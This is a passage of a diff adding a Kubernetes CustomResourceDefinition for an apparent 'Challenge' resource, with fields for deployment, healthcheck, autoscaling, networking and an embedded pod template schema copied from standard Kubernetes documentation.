More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: ChallengeSpec defines the desired state of Challenge + properties: + allowConnectTo: + items: + type: string + type: array + deployed: + default: false + description: Shows if the challenge is ready to be deployed, if not, it sets the replicas to 0 and disables services/ingress + type: boolean + healthcheck: + description: Healthcheck checks if the challenge works If empty, healthcheck is not enabled by default + properties: + enabled: + default: false + type: boolean + image: + default: healthcheck + description: Image for the healthcheck container + type: string + type: object + horizontalPodAutoscalerSpec: + description: Autoscaling features determine quantity of replicas and CPU utilization If empty, autoscaling is not enabled by default + properties: + maxReplicas: + description: upper limit for the number of pods that can be set by the autoscaler; cannot be smaller than MinReplicas. + format: int32 + type: integer + minReplicas: + description: minReplicas is the lower limit for the number of replicas to which the autoscaler can scale down. It defaults to 1 pod. minReplicas is allowed to be 0 if the alpha feature gate HPAScaleToZero is enabled and at least one Object or External metric is configured. Scaling is active as long as at least one metric value is available. + format: int32 + type: integer + targetCPUUtilizationPercentage: + description: target average CPU utilization (represented as a percentage of requested CPU) over all the pods; if not specified the default autoscaling policy will be used. + format: int32 + type: integer + required: + - maxReplicas + type: object + image: + default: challenge + description: Image used by the deployment + type: string + network: + description: 'The network specifications: if it''s public or not and specifications about ports' + properties: + ports: + description: By default, one port is set with default values + items: + properties: + domains: + description: Extra domains for managed certificates. Only used for type HTTPS. + items: + type: string + type: array + name: + description: Name of the port + type: string + port: + description: Port + format: int32 + type: integer + protocol: + default: TCP + description: Protocol is not optional + type: string + targetPort: + anyOf: + - type: integer + - type: string + description: TargetPort is not optional + x-kubernetes-int-or-string: true + required: + - protocol + - targetPort + type: object + type: array + public: + default: false + type: boolean + type: object + persistentVolumeClaims: + description: Names of the desired PersistentVolumeClaims + items: + type: string + type: array + podTemplate: + description: PodTemplate is used to set the template for the deployment's pod, so that an author can add volumeMounts and other extra features + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. 
More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + template: + description: Template defines the pods that will be created from this pod template. https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + properties: + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + spec: + description: 'Specification of the desired behavior of the pod. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status' + properties: + activeDeadlineSeconds: + description: Optional duration in seconds the pod may be active on the node relative to StartTime before the system will actively try to mark it failed and kill associated containers. Value must be a positive integer. + format: int64 + type: integer + affinity: + description: If specified, the pod's scheduling constraints + properties: + nodeAffinity: + description: Describes node affinity scheduling rules for the pod. + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule pods to nodes that satisfy the affinity expressions specified by this field, but it may choose a node that violates one or more of the expressions. The node that is most preferred is the one with the greatest sum of weights, i.e. for each node that meets all of the scheduling requirements (resource request, requiredDuringScheduling affinity expressions, etc.), compute a sum by iterating through the elements of this field and adding "weight" to the sum if the node matches the corresponding matchExpressions; the node(s) with the highest sum are the most preferred. + items: + description: An empty preferred scheduling term matches all objects with implicit weight 0 (i.e. it's a no-op). A null preferred scheduling term matches no objects (i.e. is also a no-op). + properties: + preference: + description: A node selector term, associated with the corresponding weight. + properties: + matchExpressions: + description: A list of node selector requirements by node's labels. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector requirements by node's fields. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. 
+ properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + weight: + description: Weight associated with matching the corresponding nodeSelectorTerm, in the range 1-100. + format: int32 + type: integer + required: + - preference + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified by this field are not met at scheduling time, the pod will not be scheduled onto the node. If the affinity requirements specified by this field cease to be met at some point during pod execution (e.g. due to an update), the system may or may not try to eventually evict the pod from its node. + properties: + nodeSelectorTerms: + description: Required. A list of node selector terms. The terms are ORed. + items: + description: A null or empty node selector term matches no objects. The requirements of them are ANDed. The TopologySelectorTerm type implements a subset of the NodeSelectorTerm. + properties: + matchExpressions: + description: A list of node selector requirements by node's labels. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector requirements by node's fields. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. 
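+ # A nodeAffinity stanza of the shape defined above; the label key and
+ # value are placeholders:
+ #   affinity:
+ #     nodeAffinity:
+ #       requiredDuringSchedulingIgnoredDuringExecution:
+ #         nodeSelectorTerms:
+ #         - matchExpressions:
+ #           - key: kubernetes.io/arch
+ #             operator: In
+ #             values: ["amd64"]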
+ items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + type: array + required: + - nodeSelectorTerms + type: object + type: object + podAffinity: + description: Describes pod affinity scheduling rules (e.g. co-locate this pod in the same node, zone, etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule pods to nodes that satisfy the affinity expressions specified by this field, but it may choose a node that violates one or more of the expressions. The node that is most preferred is the one with the greatest sum of weights, i.e. for each node that meets all of the scheduling requirements (resource request, requiredDuringScheduling affinity expressions, etc.), compute a sum by iterating through the elements of this field and adding "weight" to the sum if the node has pods which matches the corresponding podAffinityTerm; the node(s) with the highest sum are the most preferred. + items: + description: The weights of all of the matched WeightedPodAffinityTerm fields are added per-node to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. 
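+ # A weighted pod-affinity term following this schema (labels are
+ # hypothetical):
+ #   podAffinity:
+ #     preferredDuringSchedulingIgnoredDuringExecution:
+ #     - weight: 50
+ #       podAffinityTerm:
+ #         topologyKey: kubernetes.io/hostname
+ #         labelSelector:
+ #           matchLabels:
+ #             app: cache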
+ type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching the corresponding podAffinityTerm, in the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified by this field are not met at scheduling time, the pod will not be scheduled onto the node. If the affinity requirements specified by this field cease to be met at some point during pod execution (e.g. due to a pod label update), the system may or may not try to eventually evict the pod from its node. When there are multiple elements, the lists of nodes corresponding to each podAffinityTerm are intersected, i.e. all terms must be satisfied. + items: + description: Defines a set of pods (namely those matching the labelSelector relative to the given namespace(s)) that this pod should be co-located (affinity) or not co-located (anti-affinity) with, where co-located is defined as running on a node whose value of the label with key <topologyKey> matches that of any node on which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values.
If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + podAntiAffinity: + description: Describes pod anti-affinity scheduling rules (e.g. avoid putting this pod in the same node, zone, etc. as some other pod(s)). 
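+ # Anti-affinity of this shape is commonly used to spread replicas across
+ # nodes (the app label is illustrative):
+ #   podAntiAffinity:
+ #     requiredDuringSchedulingIgnoredDuringExecution:
+ #     - topologyKey: kubernetes.io/hostname
+ #       labelSelector:
+ #         matchLabels:
+ #           app: example-challenge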
+ properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule pods to nodes that satisfy the anti-affinity expressions specified by this field, but it may choose a node that violates one or more of the expressions. The node that is most preferred is the one with the greatest sum of weights, i.e. for each node that meets all of the scheduling requirements (resource request, requiredDuringScheduling anti-affinity expressions, etc.), compute a sum by iterating through the elements of this field and adding "weight" to the sum if the node has pods which matches the corresponding podAffinityTerm; the node(s) with the highest sum are the most preferred. + items: + description: The weights of all of the matched WeightedPodAffinityTerm fields are added per-node to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. 
This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching the corresponding podAffinityTerm, in the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the anti-affinity requirements specified by this field are not met at scheduling time, the pod will not be scheduled onto the node. If the anti-affinity requirements specified by this field cease to be met at some point during pod execution (e.g. due to a pod label update), the system may or may not try to eventually evict the pod from its node. When there are multiple elements, the lists of nodes corresponding to each podAffinityTerm are intersected, i.e. all terms must be satisfied. + items: + description: Defines a set of pods (namely those matching the labelSelector relative to the given namespace(s)) that this pod should be co-located (affinity) or not co-located (anti-affinity) with, where co-located is defined as running on a node whose value of the label with key matches that of any node on which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. 
A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + type: object + automountServiceAccountToken: + description: AutomountServiceAccountToken indicates whether a service account token should be automatically mounted. + type: boolean + containers: + description: List of containers belonging to the pod. Containers cannot currently be added or removed. There must be at least one container in a Pod. Cannot be updated. + items: + description: A single application container that you want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker image''s CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. 
Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within a shell. The docker image''s ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set in the container. Cannot be updated. + items: + description: EnvVar represents an environment variable present in a Container. + properties: + name: + description: Name of the environment variable. Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) are expanded using the previously defined environment variables in the container and any service environment variables. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: supports metadata.name, metadata.namespace, `metadata.labels['''']`, `metadata.annotations['''']`, spec.nodeName, spec.serviceAccountName, status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, limits.ephemeral-storage, requests.cpu, requests.memory and requests.ephemeral-storage) are currently supported.' 
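As a sketch of how the valueFrom sources described here appear in a container spec (the variable names, container name, and Secret name are hypothetical):

    env:
      - name: POD_NAME
        valueFrom:
          fieldRef:
            fieldPath: metadata.name     # downward API: this pod's own name
      - name: CPU_LIMIT
        valueFrom:
          resourceFieldRef:
            containerName: app           # hypothetical container name
            resource: limits.cpu
            divisor: "1"                 # expose the limit in whole cores
      - name: DB_PASSWORD
        valueFrom:
          secretKeyRef:
            name: db-credentials         # hypothetical Secret name
            key: password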
+ properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret in the pod's namespace + properties: + key: + description: The key of the secret to select from. Must be a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. + items: + description: EnvFromSource represents the source of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend to each key in the ConfigMap. Must be a C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images This field is optional to allow higher level config management to default or override container images in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system should take in response to container lifecycle events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately after a container is created. If the handler fails, the container is terminated and restarted according to its restart policy. Other management of the container blocks until the hook completes. 
More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately before a container is terminated due to an API request or management event such as liveness/startup probe failure, preemption, resource contention, etc. The handler is not called if the container crashes or exits. The reason for termination is passed to the handler. The Pod''s termination grace period countdown begins before the PreStop hooked is executed. Regardless of the outcome of the handler, the container will eventually terminate within the Pod''s termination grace period. Other management of the container blocks until the hook completes or until the termination grace period is reached. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. 
To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. Container will be restarted if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows 